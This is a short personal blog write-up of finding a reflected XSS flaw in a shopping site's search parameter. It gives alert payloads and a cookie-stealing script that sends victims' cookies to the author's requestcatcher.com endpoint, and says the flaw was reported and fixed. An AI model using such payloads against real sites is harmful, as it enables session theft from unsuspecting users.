Thứ Năm, 14 tháng 5, 2020

[PenTest] L*G.vn XSS detecting and exploiting!

Hi ,
Today, I will show you some interesting stuff which I have just done .
My friend want to buy a backpack from this website, she sent web address to me and asked me how the backpack was .




I dont really care about backpack.

In my vision, the only thing exist is the search engine on the left side.




I decide to fuzz it and dectect the parameters in order to conduct a deep research




the only parameter is "q" .

first of all , I try to input some basic payload to determine . After about 10-15 minutes fuzzing , I think this website vulnerable to XSS . when I input this into URL
<script>alert("1337")</script>
the website responds a little bit different behavior

Before inputing






After inputing







 To ensure this guess and for further researching, I use some necessary tools .




It seems to me that my guessing was true . But why the alert method couldn't be executed in a right way? .

After about 2 hours look through the source code and input many payloads . I figure out how to execute a XSS payload exactly . It's coming below


<script>alert("1337")</script><script>alert("4rth4s")</script>
And the dialog comes up ! It means I have completely exploited this XSS vulnerability :


and of course I dont want to stop . My aim is to get the cookie from the victim whom I send my link to .

First of all , I need a place which can receive data (cookies ,authentication, login credential , ..) from victim via the malicious URL . I choose Request Catcher , a useful tool for debugging and testing webhooks, HTTP clients . 


And then , I need a payload which could be injected to the main URL make the browser of the victim sends to me cookie . After many times trying to build a nice payload , finally , I made it



<script>alert("1337")</script><script>document.location='https://4rth4s.requestcatcher.com/' +document.cookie</script>
And all the cookies of the user that click this link will be stolen .

I had reported this to the admin and hope they will fix it !

update :
Report 17/5 
FIXED 17/5

Happy Hacking !





















Phổ Biến